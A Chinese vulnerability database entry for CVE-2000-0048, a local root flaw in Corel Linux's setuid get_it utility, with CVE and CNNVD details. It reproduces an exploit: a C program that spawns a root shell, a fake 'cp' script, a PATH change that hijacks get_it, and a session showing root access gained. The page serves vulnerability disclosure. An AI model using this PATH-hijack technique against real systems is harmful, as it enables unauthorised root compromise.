Corel Linux get_it路径漏洞

Corel Linux get_it路径漏洞

漏洞ID 1105689 漏洞类型 其他
发布时间 2000-01-12 更新时间 2005-05-02
图片[1]-Corel Linux get_it路径漏洞-安全小百科CVE编号 CVE-2000-0048
图片[2]-Corel Linux get_it路径漏洞-安全小百科CNNVD-ID CNNVD-200001-033
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19723
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-033
|漏洞详情
CorelLinuxUpdate中get_it程序存在漏洞。本地用户可以通过指定备用cp程序提升根访问权。
|漏洞EXP
source: http://www.securityfocus.com/bid/928/info

A component of the "Corel Update" utility distributed with Corel's Linux OS is vulnerable to a local PATH vulnerability. The binary "get_it", which is stored in /usr/X11R6/bin, is setuid root installed by default on all Corel LinuxOS systems (it's part of their .deb package install/update utils). get_it relies on PATH to be valid when it calls 'cp' (without the full path), making it possible to spawn an arbitrary program (called 'cp') with inherited root privs by changing the first searched path to one in which a malicious cp lies. The consequences are immediate local root compromise.

CorelLinux:~$ id
uid=1001(tascon) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~$ cat misu.c
#include <stdio.h>
#include <unistd.h>

main(argc,argv)
int argc;
char **argv;
{
if (argc==2);
setuid(atoi(argv[1]));
execlp("/bin/bash","/bin/bash",NULL);
}
CorelLinux:~$ cc -o misu misu.c
CorelLinux:~$ pwd
/home/tascon
CorelLinux:~$ cat cp
echo $1 $2 $3
/home/tascon/misu 0
CorelLinux:~$ export PATH=.:$PATH
CorelLinux:~$ get_it
/usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~# exit
exit
/usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
|参考资料

来源:linux.corel.com
链接:http://linux.corel.com/support/clos_patch1.htm
来源:BID
名称:928
链接:http://www.securityfocus.com/bid/928

相关推荐: Apache httpd 1.3.2超多头MIME选项拒绝服务漏洞

Apache httpd 1.3.2超多头MIME选项拒绝服务漏洞 漏洞ID 1207309 漏洞类型 未知 发布时间 1998-08-07 更新时间 1998-08-07 CVE编号 CVE-1999-1199 CNNVD-ID CNNVD-199808-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享